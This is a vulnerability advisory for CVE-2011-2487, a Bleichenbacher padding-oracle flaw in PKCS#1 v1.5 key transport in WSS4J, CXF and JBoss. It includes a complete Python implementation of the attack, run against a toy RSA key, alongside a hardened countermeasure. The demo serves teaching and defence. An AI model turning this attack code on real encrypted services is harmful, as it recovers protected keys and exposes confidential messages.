PT-2020-7102 · Red Hat +1 · JBossWS +9

Juraj Somorovsky +2

Published 2020-03-11 · Updated 2023-02-13

CVE-2011-2487

CVSS v3.1: 5.9 Medium

Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
Name of the Vulnerable Software and Affected Versions

Apache WSS4J versions prior to 1.6.5
JBossWS (affected versions not specified)
Red Hat JBoss Business Rules Management System (affected versions not specified)
Red Hat JBoss Enterprise Application Platform (affected versions not specified)
Red Hat JBoss Enterprise SOA Platform (affected versions not specified)
Red Hat JBoss Enterprise Web Platform (affected versions not specified)
Red Hat JBoss Middleware (affected versions not specified)
Red Hat JBoss Portal (affected versions not specified)
Red Hat JBoss Web Services (affected versions not specified)
Apache CXF (affected versions not specified)
Description

The implementations of the PKCS#1 v1.5 key transport mechanism for XML Encryption in the affected software are susceptible to a Bleichenbacher attack, an adaptive chosen-ciphertext attack. The recipient reveals, through an observable difference such as a distinguishable error response, whether the RSA-decrypted block carries valid PKCS#1 v1.5 padding. An attacker who can submit many modified ciphertexts to this padding oracle can recover the wrapped symmetric (content-encryption) key and use it to decrypt the protected message or to conduct further attacks. The issue is the use of the PKCS#1 v1.5 RSA key transport scheme, a cryptographic algorithm the weakness enumeration below classifies as broken; the symmetric cipher protecting the message content is not itself at fault.
Recommendations

For Apache WSS4J versions prior to 1.6.5, update to version 1.6.5 or later. For JBossWS, Red Hat JBoss Business Rules Management System, Red Hat JBoss Enterprise Application Platform, Red Hat JBoss Enterprise SOA Platform, Red Hat JBoss Enterprise Web Platform, Red Hat JBoss Middleware, Red Hat JBoss Portal, Red Hat JBoss Web Services, and Apache CXF, no information about a fixed version is available at the moment. Until a fix is deployed, the recipient should not report a PKCS#1 v1.5 decryption or padding failure back to the sender in any distinguishable way, and RSA-OAEP key transport should be preferred over RSA PKCS#1 v1.5 where both peers support it.
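The attack described under Description and the countermeasure behind the recommendation above, carried through end to end in Python as an added example for this page (this is illustrative code written here, not code from Apache WSS4J, Apache CXF or JBossWS). Everything in it is an assumption made for the example: a constructed toy RSA key built from two Mersenne primes (a 234-bit modulus, so the search finishes in a few seconds, whereas real key transport uses 1024-bit or larger moduli and the same algorithm with more queries), a constructed 16-byte content-encryption key, a vulnerable `unwrap` that lets PKCS#1 v1.5 padding failures surface as errors, the Bleichenbacher interval search that turns those errors into the wrapped key, and a hardened `unwrap` that substitutes a random key of the expected length instead of failing, so the same search gets no signal. All function names are hypothetical.

```python
"""Bleichenbacher padding-oracle attack on PKCS#1 v1.5 RSA key transport (toy demo).

Added example for this page, not code from WSS4J, CXF or JBossWS. The RSA key is
a constructed toy (two Mersenne primes, 234-bit modulus) so the search finishes in
a few seconds; the algorithm is unchanged for real key sizes.
"""
import secrets

# Constructed toy key. Never use Mersenne primes for a real key: the modulus
# factors instantly. e = 65537 is coprime to (p-1)(q-1) for these two primes.
P, Q, E = (1 << 127) - 1, (1 << 107) - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8          # modulus size in bytes (30)
KEY = bytes(range(16))                 # constructed 16-byte content-encryption key


def pkcs1_pad(msg: bytes, k: int) -> bytes:
    """Type 2 block: 00 || 02 || PS || 00 || M, PS at least 8 non-zero random bytes."""
    if len(msg) > k - 11:
        raise ValueError("message too long")
    ps = bytes(secrets.choice(range(1, 256)) for _ in range(k - 3 - len(msg)))
    return b"\x00\x02" + ps + b"\x00" + msg


def pkcs1_unpad(em: bytes) -> bytes:
    """Strict type 2 check; raises ValueError on any violation."""
    if len(em) < 11 or em[0] != 0 or em[1] != 2:
        raise ValueError("bad block type")
    sep = em.find(b"\x00", 2)
    if sep < 10:                       # no separator, or PS shorter than 8 bytes
        raise ValueError("bad padding string")
    return em[sep + 1:]


def rsa_wrap(key: bytes) -> int:
    return pow(int.from_bytes(pkcs1_pad(key, K), "big"), E, N)


def rsa_decrypt_raw(c: int) -> bytes:
    return pow(c, D, N).to_bytes(K, "big")


def vulnerable_unwrap(c: int) -> bytes:
    """Vulnerable recipient: a padding failure surfaces as an error the sender can observe."""
    return pkcs1_unpad(rsa_decrypt_raw(c))


def hardened_unwrap(c: int, key_len: int) -> bytes:
    """Countermeasure: never signal a padding failure. On any problem substitute a random
    key of the expected length; the later symmetric decryption then fails exactly as it
    would for a wrong key, and the sender learns nothing about the padding."""
    try:
        key = pkcs1_unpad(rsa_decrypt_raw(c))
    except ValueError:
        key = b""
    return key if len(key) == key_len else secrets.token_bytes(key_len)


def make_oracle(unwrap):
    """The recipient as the attacker sees it: True if unwrap raised no error. Counts queries."""
    calls = [0]

    def oracle(c: int) -> bool:
        calls[0] += 1
        try:
            unwrap(c)
            return True
        except ValueError:
            return False
    return oracle, calls


def bleichenbacher(c0: int, oracle) -> bytes:
    """Recover the padded plaintext of c0 (c0 is itself conforming, so no blinding step)."""
    B = 1 << (8 * (K - 2))
    B2, B3 = 2 * B, 3 * B
    cdiv = lambda a, b: -(-a // b)                        # ceiling division
    conforms = lambda s: oracle(c0 * pow(s, E, N) % N)    # is m*s mod N a valid block?

    s = cdiv(N, B3)                                        # step 2a: first conforming multiplier
    while not conforms(s):
        s += 1
    M = [(B2, B3 - 1)]
    while True:
        new = []                                           # step 3: narrow intervals with s
        for a, b in M:
            for r in range(cdiv(a * s - B3 + 1, N), (b * s - B2) // N + 1):
                lo, hi = max(a, cdiv(B2 + r * N, s)), min(b, (B3 - 1 + r * N) // s)
                if lo <= hi:
                    new.append((lo, hi))
        M = []
        for lo, hi in sorted(new):                         # merge overlapping intervals
            if M and lo <= M[-1][1] + 1:
                M[-1] = (M[-1][0], max(M[-1][1], hi))
            else:
                M.append((lo, hi))
        if len(M) == 1 and M[0][0] == M[0][1]:             # step 4: one candidate left
            return M[0][0].to_bytes(K, "big")
        if len(M) > 1:                                     # step 2b: several intervals, step s
            s += 1
            while not conforms(s):
                s += 1
        else:                                              # step 2c: one interval, halve it
            a, b = M[0]
            r = cdiv(2 * (b * s - B2), N)
            while True:
                hit = next((t for t in range(cdiv(B2 + r * N, b), (B3 - 1 + r * N) // a + 1)
                            if conforms(t)), None)
                if hit is not None:
                    s = hit
                    break
                r += 1


def run_attack(key: bytes = KEY):
    """Attack the vulnerable recipient; returns (recovered key, oracle queries used)."""
    oracle, calls = make_oracle(vulnerable_unwrap)
    return pkcs1_unpad(bleichenbacher(rsa_wrap(key), oracle)), calls[0]


def hardened_gives_no_signal(key: bytes = KEY, trials: int = 50) -> bool:
    """Hardened recipient: genuine and random ciphertexts alike yield a same-length key,
    so the attacker's oracle answers True every time and carries no information."""
    if hardened_unwrap(rsa_wrap(key), len(key)) != key:
        return False
    oracle, _ = make_oracle(lambda c: hardened_unwrap(c, len(key)))
    return all(oracle(secrets.randbelow(N)) for _ in range(trials))


if __name__ == "__main__":
    recovered, queries = run_attack()
    print(f"recovered key {recovered.hex()} after {queries} oracle queries")
    print("hardened recipient leaks a padding signal:", not hardened_gives_no_signal())
```

Run it directly to see the wrapped key come back from the vulnerable recipient after some tens of thousands of queries; the count is high because `pkcs1_unpad` enforces the full padding structure (block type, at least eight non-zero padding bytes, separator), which only makes the attacker work harder, not fail. With the toy modulus the key fits in the 19 bytes of capacity a 30-byte block leaves; the same search applies unchanged to a real-size modulus. Against `hardened_unwrap` the oracle never distinguishes valid from invalid padding, which is the property that matters: whether the leak is an explicit fault message or a timing difference, the decrypting side must not let the sender learn whether the PKCS#1 v1.5 padding was valid.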

Weakness Enumeration

Use of a Broken Cryptographic Algorithm

Related Identifiers

CVE-2011-2487
GHSA-4QQF-HMV6-R6WH
RHSA-2013:0191
RHSA-2013:0192
RHSA-2013:0193
RHSA-2013:0195
RHSA-2013:0196
RHSA-2013:0197

Affected Products

Apache CXF
Apache WSS4J
JBossWS
Red Hat JBoss Business Rules Management System
Red Hat JBoss Enterprise Application Platform
Red Hat JBoss Enterprise Portal Platform
Red Hat JBoss Enterprise Web Platform
Red Hat JBoss Middleware
Red Hat JBoss Portal
Red Hat JBoss Web Services